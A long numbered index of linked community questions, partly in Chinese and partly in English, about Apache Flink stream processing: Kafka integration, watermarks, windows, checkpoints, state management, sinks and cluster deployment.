91、[sink到MySQL,如果直接用idea的话可以运行,并且成功,大大的代码上面用的FlinkKafkaConsumer010,而我的Flink版本为1.7,kafka版本为2.12,所以当我用FlinkKafkaConsumer010就有问题,于是改为 FlinkKafkaConsumer就可以直接在idea完成sink到MySQL,但是为何当我把该程序打成Jar包,去运行的时候,就是报FlinkKafkaConsumer找不到呢](https://t.zsxq.com/MN7iuZf) 92、[SocketTextStreamWordCount中输入中文统计不出来,请问这个怎么解决,我猜测应该是需要修改一下代码,应该是这个例子默认统计英文](https://t.zsxq.com/e2VNN7Y) 93、[ Flink 应用程序本地 ide 里面运行的时候并行度是怎么算的?](https://t.zsxq.com/RVRn6AE) 94、[ 请问下flink中对于窗口的全量聚合有apply和process两种 他们有啥区别呢](https://t.zsxq.com/rzbIQBi) 95、[不知道大大熟悉Hbase不,我想直接在Hbase中查询某一列数据,因为有重复数据,所以想使用distinct统计实际数据量,请问Hbase中有没有类似于sql的distinct关键字。如果没有,想实现这种可以不?](https://t.zsxq.com/UJIubub) 96、[ 来分析一下现在Flink,Kafka方面的就业形势,以及准备就业该如何准备的这方面内容呢?](https://t.zsxq.com/VFaQn2j) 97、[ 大佬知道flink的dataStream可以转换为dataSet吗?因为数据需要11分钟一个批次计算五六个指标,并且涉及好几步reduce,计算的指标之间有联系,用Stream卡住了。](https://t.zsxq.com/Zn2FEQZ) 98、[1.如何在同一窗口内实现多次的聚合,比如像spark中的这样2.多个实时流的jion可以用window来处理一批次的数据吗?](https://t.zsxq.com/aIqjmQN) 99、[写的批处理的功能,现在本机跑是没问题的,就是在linux集群上出现了问题,就是不知道如果通过本地调用远程jar包然后传参数和拿到结果参数返回本机](https://t.zsxq.com/ZNvb2FM) 100、[我用standalone开启一个flink集群,上传flink官方用例Socket Window WordCount做测试,开启两个parallelism能正常运行,但是开启4个parallelism后出现错误](https://t.zsxq.com/femmiqf) 101、[ 有使用AssignerWithPunctuatedWatermarks 的案例Demo吗?网上找了都是AssignerWithPeriodicWatermarks的,不知道具体怎么使用?](https://t.zsxq.com/YZ3vbY3) 102、[ 有一个datastream(从文件读取的),然后我用flink sql进行计算,这个sql是一个加总的运算,然后通过retractStreamTableSink可以把文件做sql的结果输出到文件吗?这个输出到文件的接口是用什么呢?](https://t.zsxq.com/uzFyVJe) 103、[ 为啥split这个流设置为过期的](https://t.zsxq.com/6QNNrZz) 104、[ 需要使用flink 
table的水印机制控制时间的乱序问题,这种场景下我就使用水印+窗口了,我现在写的demo遇到了问题,就是在把触发计算的窗口table(WindowedTable)转换成table进行sql操作时发现窗口中的数据还是乱序的,是不是flink table的WindowedTable不支持水印窗口转table-sql的功能](https://t.zsxq.com/Q7YNRBE) 105、[ Flink 对 SQL 的重视性](https://t.zsxq.com/Jmayrbi) 106、[ flink job打开了checkpoint,任务跑了几个小时后就出现下面的错,截图是打出来的日志,有个OOM,又遇到过的没?](https://t.zsxq.com/ZrZfa2Z) 107、[ 本地测试是有数据的,之前该任务放在集群也是有数据的,可能提交过多次,现在读不到数据了 group id 也换过了, 只能重启集群解决么?](https://t.zsxq.com/emaAeyj) 108、[使用flink清洗数据存到es中,直接在flatmap中对处理出来的数据用es自己的ClientInterface类直接将数据存入es当中,不走sink,这样的处理逻辑是不是会有问题。](https://t.zsxq.com/ayBa6am) 108、[ flink从kafka拿数据(即增量数据)与存量数据进行内存聚合的需求,现在有一个方案就是程序启动的时候先用flink table将存量数据加载到内存中创建table中,然后将stream的增量数据与table的数据进行关联聚合后输出结束,不知道这种方案可行么。目前个人认为有两个主要问题:1是增量数据stream转化成append table后不知道能与存量的table关联聚合不,2是聚合后输出的结果数据是否过于频繁造成网络传输压力过大](https://t.zsxq.com/QNvbE62) 109、[ 设置时间时间特性有什么区别呢, 分别在什么场景下使用呢?两种设置时间延迟有什么区别呢 , 分别在什么场景下使用](https://t.zsxq.com/yzjAQ7a) 110、[ flink从rabbitmq中读取数据,设置了rabbitmq的CorrelationDataId和checkpoint为EXACTLY_ONCE;如果flink完成一次checkpoint后,在这次checkpoint之前消费的数据都会从mq中删除。如果某次flink停机更新,那就会出现mq中的一些数据消费但是处于Unacked状态。在flink又重新开启后这批数据又会重新消费。那这样是不是就不能保证EXACTLY_ONCE了](https://t.zsxq.com/qRrJEaa) 111、[1. 在Flink checkpoint 中, 像 operator的状态信息 是在设置了checkpoint 之后自动的进行快照吗 ?2. 上面这个和我们手动存储的 Keyed State 进行快照(这个应该是增量快照)](https://t.zsxq.com/mAqn2RF) 112、[现在有个实时商品数,交易额这种统计需求,打算用 flink从kafka读取binglog日志进行计算,但binglog涉及到insert和update这种操作时 怎么处理才能统计准确,避免那种重复计算的问题?](https://t.zsxq.com/E2BeQ3f) 113、[我这边用flink做实时监控,功能很简单,就是每条消息做keyby然后三分钟窗口,然后做些去重操作,触发阈值则报警,现在问题是同一个时间窗口同一个人的告警会触发两次,集群是三台机器,standalone cluster,初步结果是三个算子里有两个收到了同样的数据](https://t.zsxq.com/vjIeyFI) 114、[在使用WaterMark的时候,默认是每200ms去设置一次watermark,那么每个taskmanager之间,由于得到的数据不同,所以往往产生的最大的watermark不同。 那么这个时候,是各个taskmanager广播这个watermark,得到全局的最大的watermark,还是说各个taskmanager都各自用自己的watermark。主要没看到广播watermark的源码。不知道是自己观察不仔细还是就是没有广播这个变量。](https://t.zsxq.com/unq3FIa) 115、[现在遇到一个需求,需要在job内部定时去读取redis的信息,想请教flink能实现像普通程序那样的定时任务吗?](https://t.zsxq.com/AeUnAyN) 116、[有个触发事件开始聚合,等到数量足够,或者超时则sink推mq 环境 flink 1.6 用了mapState 记录触发事件 1 数据足够这个OK 2 超时state ttl 1.6支持,但是问题来了,如何在超时时候增加自定义处理?](https://t.zsxq.com/z7uZbY3) 117、[请问impala这种mpp架构的sql引擎,为什么稳定性比较差呢?](https://t.zsxq.com/R7UjeUF) 118、[watermark跟并行度相关不是,过于全局了,期望是keyby之后再针对每个keyed stream 打watermark,这个有什么好的实践呢?](https://t.zsxq.com/q7myfAQ) 119、[请问如果把一个文件的内容读取成datastream和dataset,有什么区别吗??他们都是一条数据一条数据的被读取吗?](https://t.zsxq.com/rB6yfeA) 120、[有没有kylin相关的资料,或者调优的经验?](https://t.zsxq.com/j2j6EyJ) 121、[flink先从jdbc读取配置表到流中,另外从kafka中新增或者修改这个配置,这个场景怎么把两个流一份配置流?我用的connect,接着发不成广播变量,再和实体流合并,但在合并时报Exception in thread "main" java.lang.IllegalArgumentException](https://t.zsxq.com/iMjmQVV) 122、[Flink exactly-once,kafka版本为0.11.0 ,sink基于FlinkKafkaProducer 每五分钟一次checkpoint,但是checkpoint开始后系统直接卡死,at-lease-once 一分钟能完成的checkpoint, 现在十分钟无法完成没进度还是0, 不知道哪里卡住了](https://t.zsxq.com/RFQNFIa) 123、[flink的状态是默认存在于内存的(也可以设置为rocksdb或hdfs),而checkpoint里面是定时存放某个时刻的状态信息,可以设置hdfs或rocksdb是这样理解的吗?](https://t.zsxq.com/NJq3rj2) 124、[Flink异步IO中,下图这两种有什么区别?为啥要加 CompletableFuture.supplyAsync,不太明白?](https://t.zsxq.com/NJq3rj2) 125、[flink的状态是默认存在于内存的(也可以设置为rocksdb或hdfs),而checkpoint里面是定时存放某个时刻的状态信息,可以设置hdfs或rocksdb是这样理解的吗?](https://t.zsxq.com/NJq3rj2) 126、[有个计算场景,从kafka消费两个数据源,两个数据结构都有时间段概念,计算需要做的是匹配两个时间段,匹配到了,就生成一条新的记录。请问使用哪个工具更合适,flink table还是cep?请大神指点一下 我这边之前的做法,将两个数据流转为table.两个table over window后join成新的表。结果job跑一会就oom.](https://t.zsxq.com/rniUrjm) 127、[一个互联网公司,或者一个业务系统,如果想做一个全面的监控要怎么做?有什么成熟的方案可以参考交流吗?有什么有什么度量指标吗?](https://t.zsxq.com/vRZ7qJ2) 
128、[怎么深入学习flink,或者其他大数据组件,能为未来秋招找一份大数据相关(计算方向)的工作增加自己的竞争力?](https://t.zsxq.com/3vfyJau) 129、[oppo的实时数仓,其中明细层和汇总层都在kafka中,他们的关系库的实时数据也抽取到kafka的ods,那么在构建数仓的,需要join 三四个大业务表,业务表会变化,那么是大的业务表是从kafka的ods读取吗?实时数仓,多个大表join可以吗](https://t.zsxq.com/VBIunun) 130、[Tuple类型有什么方法转换成json字符串吗?现在的场景是,结果在存储到sink中时希望存的是json字符串,这样应用程序获取数据比较好转换一点。如果Tuple不好转换json字符串,那么应该以什么数据格式存储到sink中](https://t.zsxq.com/vnaURzj) 140、[端到端的数据保证,是否意味着中间处理程序中断,也不会造成该批次处理失败的消息丢失,处理程序重新启动之后,会再次处理上次未处理的消息](https://t.zsxq.com/J6eAmYb) 141、[关于flink datastream window相关的。比如我现在使用滚动窗口,统计一周内去重用户指标,按照正常watermark触发计算,需要等到当前周的window到达window的endtime时,才会触发,这样指标一周后才能产出结果。我能不能实现一小时触发一次计算,每次统计截止到当前时间,window中所有到达元素的去重数量。](https://t.zsxq.com/7qBMrBe) 142、[FLIP-16 Loop Fault Tolerance 是讲现在的checkpoint机制无法在stream loop的时候容错吗?现在这个问题解决了没有呀?](https://t.zsxq.com/uJqzBIe) 143、[现在的需求是,统计各个key的今日累计值,一分钟输出一次。如,各个用户今日累计点击次数。这种需求用datastream还是table API方便点?](https://t.zsxq.com/uZnmQzv) 144、[本地idea可以跑的工程,放在standalone集群上,总报错,报错截图如下,大佬请问这是啥原因](https://t.zsxq.com/BqnYRN7) 145、[比如现在用k8s起了一个flink集群,这时候数据源kafka或者hdfs会在同一个集群上吗,还是会单独再起一个hdfs/kafka集群](https://t.zsxq.com/7MJujMb) 146、[flink kafka sink 的FlinkFixedPartitioner 分配策略,在并行度小于topic的partitions时,一个并行实例固定的写消息到固定的一个partition,那么就有一些partition没数据写进去?](https://t.zsxq.com/6U7QFMj) 147、[基于事件时间,每五分钟一个窗口,五秒钟滑动一次,同时watermark的时间同样是基于事件事件时间的,延迟设为1分钟,假如数据流从12:00开始,如果12:07-12:09期间没有产生任何一条数据,即在12:07-12:09这段间的数据流情况为···· (12:07:00,xxx),(12:09:00,xxx)······,那么窗口[12:02:05-12:07:05],[12:02:10-12:07:10]等几个窗口的计算是否意味着只有等到,12:09:00的数据到达之后才会触发](https://t.zsxq.com/fmq3fYF) 148、[使用flink1.7,当消费到某条消息(protobuf格式),报Caused by: org.apache.kafka.common.KafkaException: Record batch for partition Notify-18 at offset 1803009 is invalid, cause: Record is corrupt 这个异常。 如何设置跳过已损坏的消息继续消费下一条来保证业务不终断? 我看了官网kafka connectors那里,说在DeserializationSchema.deserialize(...)方法中返回null,flink就会跳过这条消息,然而依旧报这个异常](https://t.zsxq.com/MRvv3ZV) 149、[是否可以抽空总结一篇Flink 的 watermark 的原理案例?一直没搞明白基于事件时间处理时的数据乱序和数据迟到底咋回事](https://t.zsxq.com/MRJeAuj) 150、[flink中rpc通信的原理,与几个类的讲解,有没有系统详细的文章样,如有求分享,谢谢](https://t.zsxq.com/2rJyNrF) 151、[Flink中如何使用基于事件时间处理,但是又不使用Watermarks? 我在会话窗口中使用遇到一些问题,图一是基于处理时间的,测试结果session是基于keyby(用户)的,图二是基于事件时间的,不知道是我用法不对还是怎么的,测试结果发现并不是基于keyby(用户的),而是全局的session。不知道怎么修改?](https://t.zsxq.com/bM3ZZRf) 152、[flink实时计算平台,yarn模式日志收集怎么做,为什么会checkpoint失败,报警处理,后需要做什么吗?job监控怎么做](https://t.zsxq.com/BMVzzzB) 153、[有flink与jstorm的在不同应用场景下, 性能比较的数据吗? 从网络上能找大部分都是flink与storm的比较. 在jstorm官网上有一份比较的图表, 感觉参考意义不大, 应该是比较早的flink版本.](https://t.zsxq.com/237EAay) 154、[为什么使用SessionWindows.withGap窗口的话,State存不了东西呀,每次加1 ,拿出来都是null, 我换成 TimeWindow就没问题。](https://t.zsxq.com/J6eAmYb) 155、[请问一下,flink datastream流处理怎么统计去重指标? 
in the official docs I can only find a distinct concept for batch processing.](https://t.zsxq.com/y3nYZrf)
156. [A very thorough article comparing the Flink, Spark Streaming and Storm frameworks](https://t.zsxq.com/qRjqFY3)
157. [A paper on structured_streaming](https://t.zsxq.com/Eau7qNB)
158. [After the ZooKeeper cluster switched leader, the Flink cluster's job was restarted and now has no data input or output — where should I start troubleshooting?](https://t.zsxq.com/rFYbEeq)
159. [How can a DataStream be joined with static data?](https://t.zsxq.com/nEAaYNF)
160. [Clock problems caused us to receive "tomorrow's" data — what is a good way to handle this? I have seen people set a maximum jump threshold: if current event time minus the historical maximum exceeds the threshold, the maximum is not updated. How do you design watermarks sensibly — any experience to share?](https://t.zsxq.com/IAAeiA6)
161. [How can Flink query a database on a schedule?](https://t.zsxq.com/EuJ2RRf)
162. [Our company wants a web page where users pick a source and a sink and fill in a SQL statement, after which the backend generates a Flink job and submits it to the cluster — point-and-click, similar to Huawei's data middle platform. In your view, is this feasible, and how? I have no idea where to start](https://t.zsxq.com/vzZBmYB)
163. [Please explain the HA mechanism of Flink on YARN](https://t.zsxq.com/VRFIMfy)
164. [In ordinary stream processing and CEP, watermarks can be set on event time; sometimes a fairly large value is needed, which strains memory. Is there a way to use off-heap memory or another cache instead of the JVM heap, ideally with a cache mechanism, to absorb large traffic peaks?](https://t.zsxq.com/FAiiEyr)
165. [A Flink SQL question: two aggregated stream tables A and B are joined into table C. When configuring state TTL, is it better to set it on C directly, or on A and B?](https://t.zsxq.com/YnI2F66)
166. [How complex is rewriting a Spark job in Flink, and how large is the gap between their SQL support?](https://t.zsxq.com/unyneEU)
167. [Flink's allowedLateness makes windows fire multiple times, so the data is consumed repeatedly — how should this be handled when writing to ES?](https://t.zsxq.com/RfyZFUR)
168. [With taskmanager.numberOfTaskSlots: 4 everything works but CPU stays around 30%; after raising it to 8, one of my custom classes can no longer be found and Kafka consumption stops. Why? What CPU utilization is reasonable? Is slots == CPU cores the best configuration? And should the Kafka partition count match the slots/parallelism?](https://t.zsxq.com/bIAEyFe)
169. [The requirement: split each log line into 9 fields, and compute five metrics over different combinations of those fields. Approach 1: open a 5-minute sliding window firing every minute over the 9 fields, deduplicate with a reduce, map out the needed fields, filter, then open another 5-minute/1-minute sliding window for the computation — but the first window recomputes 5 minutes of data every minute, so the second window's 5-minute range sees many duplicates. Approach 2: one 5-minute/1-minute sliding window doing all the filtering and aggregation inside the process method — but at 4 million records per minute at peak, I worry Flink cannot keep up](https://t.zsxq.com/BUNfYnY)
170. [Tables a, b, c: a and c have event time. Joining a with c directly works, but joining a with b first and then with c throws an error — why?](https://t.zsxq.com/aAqBEY7)
171. [My custom source is as shown in figure 1 and used as shown in figure 2 — why, no matter what parallelism I set in sum.print().setParallelism(2) (figure 2), does the final result always look like this?](https://t.zsxq.com/zZNNRzr)
172. [New to Flink, so forgive naive questions: 1. Why is Flink said to be stateful computation? 2. What is this state? 3. Where is it stored?](https://t.zsxq.com/i6Mz7Yj)
173. [Using Flink 1.8.1 on YARN with Hadoop 2.6.0, a simple tumbling-window counting job fails at startup (see the picture). (2) Switching to Flink 1.7.1 and resubmitting to the same YARN 2.6.0 works. (3) On our test cluster with Hadoop 3.0, the Flink 1.8.1 build of the same program also runs fine. It looks like an incompatibility between Flink 1.8.1 and YARN 2.6.0](https://t.zsxq.com/vNjAIMN)
174. [Using MemoryStateBackend, how is state memory released? For example, I keep historical state in a ValueState inside a function but never clear it manually — will the program release it automatically, or does it stay in memory forever?](https://t.zsxq.com/2rVbm6Y)
175. [Could you share some Apache Beam learning material? Thanks](https://t.zsxq.com/3bIEAyv)
176. [Do Flink's DataSet/DataStream support indexed lookup and deletion like a Spark RDD? If not, what should they be converted to?](https://t.zsxq.com/yFEyZVB)
177. [Can Flink state be used like a database — an in-memory database holding business data during processing? If so, does it count as a distributed database? Only with RocksDB-style storage? Is the supported size bounded only by the local disk, and does disk-backed storage hurt performance?](https://t.zsxq.com/VNrn6iI)
178. [I built an HTTP sink that sends data in batches, but batching is controlled only by count, so the last few records never trigger a send — is there a way around this?](https://t.zsxq.com/yfmiUvf)
179. [How to do scheduled deduplicated counting: window by time, then count distinct ids within each window? I have tried quite a few approaches without finding a simple, direct one](https://t.zsxq.com/vNvrfmE)
180. [A job uses the Elasticsearch sink with a bulk size of 5000, yet monitoring shows only ~500 inserts per second. Is this related to the BulkProcessor's currentrequest being 0?](https://t.zsxq.com/rzZbQFA)
181. [Any material on deploying Flink with Docker?](https://t.zsxq.com/aIur7ai)
182. [When explaining the StreamGraph execution of keyBy, why is keyBy's ID 6? Earlier it was said that the ID is a static variable incremented by 1 on each use, so I expected 3 — am I misunderstanding?](https://t.zsxq.com/VjQjqF6)
183. [Any plans for a source-code walkthrough of the ExecutionGraph?](https://t.zsxq.com/BEmAIQv)
184. [Could you cover, at the code level, how the physical execution graph is divided into tasks, how tasks execute, and how data is passed between them?](https://t.zsxq.com/vVjiYJQ)
185. [A structure diagram of the Flink source code and of this learning project](https://t.zsxq.com/FyNJQbQ)
186. [In Flink 1.8, how can external UDF jars be loaded dynamically?](https://t.zsxq.com/qrjmmaU)
187. [How do different slots within one TaskManager interact? For example, when a source hands data to a map in a different slot, their memory is isolated — do they exchange data via serialization over the network, as I guess?](https://t.zsxq.com/ZFQjQnm)
188. [Do you have this scenario: Flink reads Kafka, each record carries an id of MongoDB table A; in map I use Flink's async I/O to look up field 1 in A, then async I/O to table B for field 2 using field 1, then table C for field 3, and so on. With several such chained lookups, what design works best?](https://t.zsxq.com/YBQFufi)
189. [Running a Flink program locally consuming from a socket, only two records in a row are consumed and the third never arrives](https://t.zsxq.com/vnufYFY)
190. [The source is filtered into two streams; each extracts event time and watermarks and applies a time window. In testing, one stream has no data, and the logs show the other stream's data reaches the window operation and goes no further — the window never seems to trigger](https://t.zsxq.com/me6EmM3)
191. [Anyone doing Flink CEP — any material?](https://t.zsxq.com/fubQrvj)
192. [BucketingSink writing across clusters: the job runs on Hadoop cluster A, reads Kafka, and writes to Hadoop cluster B. Even with B's core-site.xml and hdfs-site.xml under resources and paths like hdfs://hadoopB/xxx, it throws java.lang.RuntimeException: Error while creating FileSystem when initializing the state of the BucketingSink. Does Flink not support cross-cluster writes?](https://t.zsxq.com/fEQVjAe)
193. [How can data be sampled from a Flink DataStream or DataSet?](https://t.zsxq.com/fIMVJ2J)
194. [A Flink job OOMs frequently — what could cause it? The pipeline only parses 15+ fields and reads Redis; the TM has 10 GB. The business backfills data at night, with QPS up to ~2500](https://t.zsxq.com/7MVjyzz)
195. [Flink 1.8's state TTL supports only processing time — does that mean state never expires if I use event time?](https://t.zsxq.com/jA2NVnU)
196. [I want to compute, every hour, the average of an attribute from midnight up to the current time — how should such a window be defined?](https://t.zsxq.com/BQv33Rb)
197. [Deserializing a class inside a Flink job throws ClassNotFoundException even though the class is in the jar — has anyone seen this?](https://t.zsxq.com/nEAiIea)
198. [When building the StreamGraph, why are transforms like PartitionTransformation added as virtual nodes rather than real physical nodes?](https://t.zsxq.com/RnayrVn)
199. [Flink consumes Kafka and writes to HDFS via BucketingSink, queried through a Hive external table. Hive cannot recognize the data in in-progress files, yet I want to query incoming data in Hive in near real time without producing many small files — how should this be handled?](https://t.zsxq.com/A2fYNFA)
200. [Single-machine cluster mode: one JobManager and two TaskManagers on a 24-core box. A simple job copies qualifying messages from one Kafka topic (30 partitions) to another with default parallelism 30, achieving only ~20k records/s, which is too slow. How can the job's performance be improved?](https://t.zsxq.com/7AurJU3)
201. [Flink Metrics source-code analysis](https://t.zsxq.com/Mnm2nI6)
202. [How should this passage in the official docs be understood? Per the official example, is keyed state only available after keyBy — only then can Flink manage the stored state? If source and map define no custom operator state, is their state simply not saved?](https://t.zsxq.com/iAi6QRb)
203. [I want to build business monitoring and alerting on Flink with dynamically added CEP rules — should I use Flink CEP directly or Siddhi CEP? Any material to learn from? Thanks!](https://t.zsxq.com/3rbeuju)
204. [Are there Java demos for watermarks and triggers?](https://t.zsxq.com/eYJUbm6)
205. [Lately in production, with parallelism 40, one subtask keeps failing its checkpoint while the other 39 complete in milliseconds — how do we localize this? Also, checkpoint time splits into Checkpoint Duration (Async), Checkpoint Duration (Sync), and end-to-end minus the sync and async parts — what does each part cover, and if any one of them is long, how should it be optimized?](https://t.zsxq.com/QvbAqVB)
206. [My scenario depends heavily on the order of consumed data. Despite much work at the source — including reducing Kafka to a single partition — records still come out unordered. Can ordering be enforced on the Flink consumption side?](https://t.zsxq.com/JaUZvbY)
207. [For a requirement like computing today's PV/UV in real time, I use source->keyBy->window->trigger->process and compute UV with a ValueState inside process. The question: does the window buffer the entire day's data inside Flink? With a somewhat large daily volume this breaks down — is there another way to implement it?](https://t.zsxq.com/iQfaAeu)
208. [Flink annotations — source-code analysis](https://t.zsxq.com/f6eAu3J)
209. [How to monitor Flink's TaskManager and JobManager](https://t.zsxq.com/IuRJYne)
210. [In real streaming jobs, should the parallelism equal the Kafka topic's partition count?](https://t.zsxq.com/v7yfEIq)
211. [If we wrap Flink in our own platform UI, how do we fetch the JobManager, TaskManager, and user program logs — is there an API, or do we collect them into ELK with Flume?](https://t.zsxq.com/Zf2F6mM)
212. [How is PV/UV usually computed with Flink — store the UVs in Redis? If every UV goes to Redis, won't it blow up?](https://t.zsxq.com/72VzBEy)
213. [In Flink's checkpoint mechanism with multiple sources, records of the stream whose barrier n has arrived are set aside and buffered in an input buffer rather than processed. What happens if the buffered records exceed the input buffer? They cannot be buffered forever — and if one of the streams simply has no data, wouldn't the whole process stall?](https://t.zsxq.com/zBmm2fq)
214. [The company wants to display order data and aggregated amounts in real time as a line chart on a front end — what is the right technology stack, including storage for the data and the intermediate aggregates, and how should results be pushed to the front end?](https://t.zsxq.com/ZnIAi2j)
215. [What exactly is stored in a checkpoint?](https://t.zsxq.com/7EIeEyJ)
216. [We compute in real time each vehicle's distance to the vehicle ahead from GPS coordinates: ~6000 vehicles, one coordinate every 10 seconds. The self-join of the GPS stream checkpoints extremely slowly — several minutes each time — with RocksDB as the state backend. Any better design? Would a last_value-style function keeping each vehicle's latest coordinates before the join work, or a 10-second sliding window emitting the latest coordinates before joining?](https://t.zsxq.com/euvFaYz)
217. [At startup, can Flink resume consuming Kafka data from a specified point in time?](https://t.zsxq.com/YRnEUFe)
218. [A production problem: many jobs read a certain Hive table, and while the table is being written, readers occasionally see it as empty — how can this be solved?](https://t.zsxq.com/7QJEEyr)
219. [Building a Flink monitoring platform with InfluxDB and Grafana](https://t.zsxq.com/yVnaYR7)
220. [Flink consumes two different Kafka topics and joins them. With event time, must both topics set watermarks? What happens if only topic A's watermark is set and topic B's is not?](https://t.zsxq.com/uvFU7aY)
221. [My Flink program fails after running for a while and I have spent days failing to localize it; the checkpoint interval is 5 s (20 s fails too): Caused by: java.io.IOException: Could not flush and close the file system output stream to hdfs://HDFSaaaa/flink/PointWideTable_OffTest_Test2/1eb66edcfccce6124c3b2d6ae402ec39/chk-355/1005127c-cee3-4099-8b61-aef819d72404 in order to obtain the stream state handle](https://t.zsxq.com/NNFYJMn)
222. [What advantages does Flink's backpressure mechanism have over Storm's? Question 2: if one Flink node fails, does it affect the others, or does the checkpoint fault-tolerance mechanism move the work to other nodes?](https://t.zsxq.com/yvRNFEI)
223. [Verifying checkpoints I hit this: with both keyed and operator state, restoring works with the default or an explicit uid, but fails when uidHash is specified. I implement CheckpointedFunction, overriding snapshotState and initializeState, and have the program throw periodically to test; with uidHash set, context.isRestored() is false — I don't understand why](https://t.zsxq.com/ZJmiqZz)
224. [Each Kafka record must be matched against all the (dynamically growing) data in ES, with extra processing after the match — what viable designs are there?](https://t.zsxq.com/mYV37qF)
225. [Flink consumes Kafka with a 1-minute checkpoint interval. If the job dies after one checkpoint completes but before the next, the Kafka offset is still the one from the first checkpoint, so restarting re-consumes data — isn't that over-consumption? How does Flink's exactly-once semantics actually work?](https://t.zsxq.com/buFeyZr)
226. [The program frequently hits "Heartbeat of TaskManager with id container_e36_1564049750010_5829_01_000024 timed out", about 10 times a day — not enough memory, or network jitter?](https://t.zsxq.com/Znyja62)
227. [Are there any articles with performance-tuning guidance?](https://t.zsxq.com/AA6ma2Z)
228. [How do you monitor that Flink's Kafka consumption is healthy — any good approaches?](https://t.zsxq.com/a2N37a6)
229. [Following the official wordcount example, I started a thread in the main function, intending to refresh some configuration periodically; to test feasibility, the thread just prints a line. The result: it doesn't work — the thread seems never to run. Why? As I understand it, doesn't the JobClient execute the main function via reflection — so why doesn't the thread's print run when main executes?](https://t.zsxq.com/m2FeeMf)
230. [To retain several recently completed checkpoints, is state.checkpoints.num-retained the right setting, and how is it used?](https://t.zsxq.com/EyFUb6m)
231. [Any real-time ETL / data-warehouse cases — e.g. a streaming join of twenty fact tables?](https://t.zsxq.com/rFeIAeA)
232. [Why does my streaming job go straight to FINISHED right after I submit it to Flink?](https://t.zsxq.com/n2RFmyN)
233. [Any examples of machine-learning algorithms on Flink, beyond the official Flink examples and what is already in flink-ml?](https://t.zsxq.com/iqJiyvN)
234. [If I want to extend SQL keywords — for example to support extra data — what is the approach? It seems to require changing Calcite, which feels daunting for someone new to Flink](https://t.zsxq.com/uB6aUzZ)
235. [I want counts per type every 5 seconds, but nothing is emitted — where is the problem?](https://t.zsxq.com/2BEeu3Z)
236. [Writing to HBase from Flink — is there a demo of bulk-writing HFiles directly?](https://t.zsxq.com/VBA6IUR)
237. [How to monitor whether Kafka consumption is lagging or messages are piling up — any demo? Roll our own Spring Boot monitor, or what?](https://t.zsxq.com/IieMFMB)
238. [Any examples of computing PV/UV?](https://t.zsxq.com/j2fM3BM)
239. [How to dynamically change a window operator's type and length through a control stream?](https://t.zsxq.com/Rb2Z7uB)
240. [Could you publish a guide on remote-debugging Flink? Online material is full of pitfalls](https://t.zsxq.com/UVbaQfM)
241. [In industry, is Flink development done more in Java or in Scala?](https://t.zsxq.com/AYVjAuB)
242. [Our Flink jobs run on YARN; during a ResourceManager failover all Flink jobs failed while MR jobs kept running, with: AM is not registered for known application attempt: appattempt_1565306391442_89321_000001 or RM had restarted after AM registered. AM should re-register. Why, and how should this be handled?](https://t.zsxq.com/j6QfMzf)
243. [A distributed-systems question: counting a metric across multiple TaskManagers, TM1 has two records and TM2 has one — how does the program compute 3? What is the principle?](https://t.zsxq.com/IUVZjUv)
244. [Some of our SQL queries against Oracle are very slow because of the many predicates — are there big-data components that could speed the queries up?](https://t.zsxq.com/7MFEQR3)
245. [Has anyone built a system where Flink picks up synchronized configuration to run custom computations? The business wants users to configure computation rules for stream processing themselves — any advice?](https://t.zsxq.com/Mfa6aQB)
246. [A real-time sync job runs fine during the day, but after around 2 a.m. no data is sinked into MySQL, while offline jobs and DataX tasks sync data into MySQL at night. Everything looks normal: checkpoints are fast (20 ms), consumption continues, there are no errors in the YARN logs, and the log statements I put in the custom sink print nothing. How can this be localized quickly?](https://t.zsxq.com/z3bunyN)
247. [Any case material on handling bad data in Flink?](https://t.zsxq.com/Y3fe6Mn)
248. [How can a global variable be passed around in Flink?](https://t.zsxq.com/I2Z7Ybm)
249. [For 4-core/16 GB Flink TaskManagers, what kind of server does a dedicated YARN need — one that does nothing but scheduling?](https://t.zsxq.com/iIUZrju)
250. [A write-up on side-output](https://t.zsxq.com/m6I2BEE)
251. [When monitoring Flink with InfluxDB + Grafana, can alerting be configured, or is Prometheus more capable?](https://t.zsxq.com/amURFme)
252. [A production problem: a stateful operator was deployed without a uid; now the code must change and that operator's state cannot be restored. Is there a way out — can the previously auto-generated uid be recovered somehow?](https://t.zsxq.com/rZfyZvn)
253. [In tableEnv.registerDataStream("Orders", ds, "user, product, amount, proctime.proctime, rowtime.rowtime"), when registering the stream as a table like this, what do the two rowtime parts each mean?](https://t.zsxq.com/uZz3Z7Q)
254. [For Flink on YARN session mode, the official example is flink run -c xxx.MainClass job.jar — how does it know which appid on YARN is the Flink session?](https://t.zsxq.com/yBiEyf2)
255. [Is there a detailed usage example of the Flink Netty Connector? Can a source built on Netty reply to messages directly, or can it only receive them passively?](https://t.zsxq.com/yBeyfqv)
256. [Are jobs submitted through the Flink SQL Client fit for production?](https://t.zsxq.com/FIEia6M)
257. [For Flink batch writes back to MySQL, is tableEnv.sqlUpdate("insert into t2 select * from t1") unusable? How should the sink table t2 be registered? The only JDBC-related TableSinks are JDBCAppendTableSink (a BatchTableSink) and JDBCUpsertTableSink (a StreamTableSink), and the former only accepts insert-into-values syntax. So I currently select the query into a DataSet and call JDBCAppendTableSink.emitDataSet(ds), but that misses the sql-rule-any goal](https://t.zsxq.com/ZBIaUvF)
258. [In streaming mode, without writing results to a store, is there a RESTful API through which the computed results can be fetched?](https://t.zsxq.com/aq3BIU7)
259. [I need to send certain messages to a specified partition of a Kafka topic — how?](https://t.zsxq.com/NbYnAYF)
260. [My job runs fine in IDEA but on the production cluster reports Caused by: java.lang.NoSuchMethodError: org.apache.flink.api.java.ClosureCleaner.clean(Ljava/lang/Object;Z)V — how do I fix this?](https://t.zsxq.com/YfmAMfm)
261. [A strange problem with streaming SQL: a timestamp is correct in the DataStream, but after registering the stream as a table and printing, it is eight hours off — do you know why?](https://t.zsxq.com/72n6MVb)
262. [How do I configure shipping some of Flink's logs asynchronously to Kafka, and does the configuration require a cluster restart to take effect?](https://t.zsxq.com/RjQFmIQ)
263. [Hi — how is Flink 1.9's support for dimension-table joins coming along? Any documentation?](https://t.zsxq.com/Q7u3vzR)
264. [Flink SQL: SELECT city_name as city_name, count(1) as total, max(create_time) as create_time FROM *, with retractStream.timeWindowAll(Time.minutes(5)) as a global window in the code, writing results to HDFS — the output contains two fully duplicated rows, such as (常州, 2283, 1566230703). Why?](https://t.zsxq.com/aEEA66M)
265. [I store checkpoints with RocksDB directly on local disk; after running in production for a while the checkpoints take more and more space — how can they be cleaned up automatically?](https://t.zsxq.com/YNrfyrj)
